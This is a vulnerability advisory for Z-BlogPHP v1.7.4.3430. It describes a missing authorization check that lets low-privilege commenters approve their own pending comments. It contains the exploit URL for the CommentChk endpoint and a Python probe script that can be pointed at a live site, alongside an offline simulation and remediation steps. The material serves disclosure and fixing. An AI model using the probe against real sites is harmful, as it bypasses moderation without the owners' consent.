Z-BlogPHP Post-Auth Missing Authorization Allows Low-Privilege Commenters to Approve Their Own Pending Comments

Project: Z-BlogPHP 

Repository: https://github.com/zblogcn/zblogphp 

Affected Version: v1.7.4.3430 

Vulnerability ID: VPLUS-2026-16327

Title: Post-Authentication Authorization Flaw in Z-BlogPHP Allows Commenters to Approve Their Own Pending Comments

Description: A privilege management flaw exists in Z-BlogPHP when comment moderation is enabled. Low-privilege users with the “commenter” role are expected to only view their own comments, but in practice they can directly approve their own comments while those comments are still pending review.

Code analysis shows two key issues:

  1. Admin_CommentMng() filters the comment list by comm_AuthorID=current_user when the user does not have the CommentAll privilege. This allows low-privilege commenters to view their own pending comments in the backend moderation interface.
  2. CheckComment() incorrectly treats cmt->AuthorID == current_user as an authorized condition when the user lacks CommentAll, allowing the comment author to change the IsChecking status of their own comment.

As a result, once comment moderation is enabled, a low-privilege commenter can submit a comment that is initially pending and not publicly visible, then directly invoke the moderation endpoint to approve it without administrator review.

Affected File: zb_system/function/c_system_event.php

Affected Function: CheckComment

Affected Line: 1196

Technical Root Cause: The application does not properly restrict comment moderation actions to privileged users. It incorrectly considers the comment author to be an authorized actor for changing moderation state, which breaks the intended moderation workflow.

Attack Vector: A low-privilege commenter can log in to the backend and access:

/zb_system/cmd.php?act=CommentChk&id=<comment_id>&ischecking=0&csrfToken=<token>

This changes the user’s own comment from pending review to approved. The csrfToken is the one issued to the commenter’s own authenticated backend session, so the request passes the CSRF check; the missing control is the authorization check on who may change moderation state, not the token.

Proof of Concept: A test run reproduced the issue with the following sequence:

  1. Administrator enabled comment moderation
  2. Administrator created a low-privilege commenter account and a test article
  3. The commenter submitted a comment
  4. Before approval, the comment was not visible on the frontend
  5. The commenter directly called the CommentChk moderation endpoint
  6. The comment immediately became visible on the frontend

Observed Results:

  • Before self-approval: comment not visible publicly
  • Self-approval request: HTTP 200
  • After self-approval: comment visible publicly

Example Verification Output:

  • comment_id=9
  • before_visible=False
  • HTTP 200
  • after_visible=True
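The following script is an added example written for this advisory; it is not Z-BlogPHP code and not the original reporter's test harness. self_approve_probe() automates steps 4 to 6 of the proof of concept above (check frontend visibility, call CommentChk with ischecking=0 and the commenter's csrfToken, check visibility again) and returns the same fields as the verification output. So that it runs offline, FakeZBlog is a constructed stand-in that models only what the advisory describes: IsChecking (1 = pending, 0 = approved), public rendering of approved comments, and the CheckComment() authorization decision in both its flawed form (comment author is treated as authorized when CommentAll is absent) and its corrected form (CommentAll required). The base URL, article URL, comment text marker, user IDs and token value are constructed sample data. Against a live target, pass an authenticated requests.Session() carrying the commenter's login cookies and the csrfToken from that backend session in place of the fake.

```python
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlparse


def self_approve_probe(client, base_url, article_url, comment_id, marker, csrf_token):
    """Steps 4-6 of the PoC: frontend visibility, CommentChk ischecking=0, visibility again.

    `client` only needs a requests-style get(url) returning an object with
    .status_code and .text (an authenticated requests.Session() works).
    `marker` is text unique to the pending comment.
    """
    before = marker in client.get(article_url).text
    chk_url = (f"{base_url.rstrip('/')}/zb_system/cmd.php?act=CommentChk"
               f"&id={comment_id}&ischecking=0&csrfToken={csrf_token}")
    resp = client.get(chk_url)
    after = marker in client.get(article_url).text
    return {"comment_id": comment_id, "before_visible": before,
            "status": resp.status_code, "after_visible": after}


@dataclass
class FakeResponse:
    status_code: int
    text: str


@dataclass
class FakeZBlog:
    """Constructed stand-in for the moderation behaviour described in the advisory.

    Not Z-BlogPHP code. `require_comment_all=False` reproduces the flawed check
    (author of the comment counts as authorized); True is the corrected check.
    """
    user_id: int                      # the logged-in backend user
    has_comment_all: bool             # CommentAll privilege of that user
    require_comment_all: bool         # False = flawed check, True = corrected check
    csrf_token: str = "t0k3n"         # constructed token for the session
    comments: dict = field(default_factory=dict)  # id -> [author_id, body, is_checking]

    def add_pending_comment(self, cid, author_id, body):
        self.comments[cid] = [author_id, body, 1]   # IsChecking=1: pending review

    def get(self, url):
        q = parse_qs(urlparse(url).query)
        if q.get("act") == ["CommentChk"]:
            return self._comment_chk(q)
        # Any other URL is the public article page: only approved comments render.
        shown = [body for _, body, chk in self.comments.values() if chk == 0]
        return FakeResponse(200, "".join(f"<li>{b}</li>" for b in shown))

    def _comment_chk(self, q):
        if q.get("csrfToken") != [self.csrf_token]:
            return FakeResponse(403, "csrf token mismatch")
        cid = int(q["id"][0])
        if cid not in self.comments:
            return FakeResponse(404, "no such comment")
        author_id = self.comments[cid][0]
        # The flawed branch: ownership is treated as authorization when CommentAll is absent.
        owner_may_moderate = (not self.require_comment_all) and author_id == self.user_id
        if not (self.has_comment_all or owner_may_moderate):
            return FakeResponse(403, "not authorized")
        self.comments[cid][2] = int(q.get("ischecking", ["0"])[0])
        return FakeResponse(200, "ok")


def demo():
    """Run the probe as the commenter against the flawed and corrected checks, and once
    as a separate CommentAll moderator to show the corrected check still allows moderation."""
    results = {}
    scenarios = (("vulnerable", 7, False, False),
                 ("fixed", 7, False, True),
                 ("fixed_moderator", 1, True, True))
    for name, uid, has_all, require_all in scenarios:
        site = FakeZBlog(user_id=uid, has_comment_all=has_all, require_comment_all=require_all)
        site.add_pending_comment(9, author_id=7, body="marker-comment-9")   # commenter is user 7
        results[name] = self_approve_probe(site, "http://blog.example",
                                           "http://blog.example/?id=1",
                                           9, "marker-comment-9", site.csrf_token)
    return results


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

In the flawed configuration the probe reports before_visible=False, HTTP 200, after_visible=True, matching the verification output above; with the corrected check the same request returns 403 and the comment stays hidden, while a user holding CommentAll can still approve it.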

Impact: This vulnerability allows low-privilege users to bypass the site’s comment moderation workflow and publish their own comments without administrator approval. It undermines trust in moderation controls and may enable spam, abusive content, or policy-violating comments to be publicly displayed.

Severity: Medium

CVSS: 6.5

Remediation Recommendations:

  1. Remove the authorization branch in CheckComment() and BatchComment() that allows the comment author to change moderation status.
  2. Restrict comment approval actions to users with CommentAll permission, or other explicitly authorized moderation roles only.
  3. Tighten Admin_CommentMng() so low-privilege commenters cannot access moderation actions or moderation UI elements for their own comments.
  4. Review all comment-related state-changing actions to ensure ownership does not incorrectly imply moderation privilege.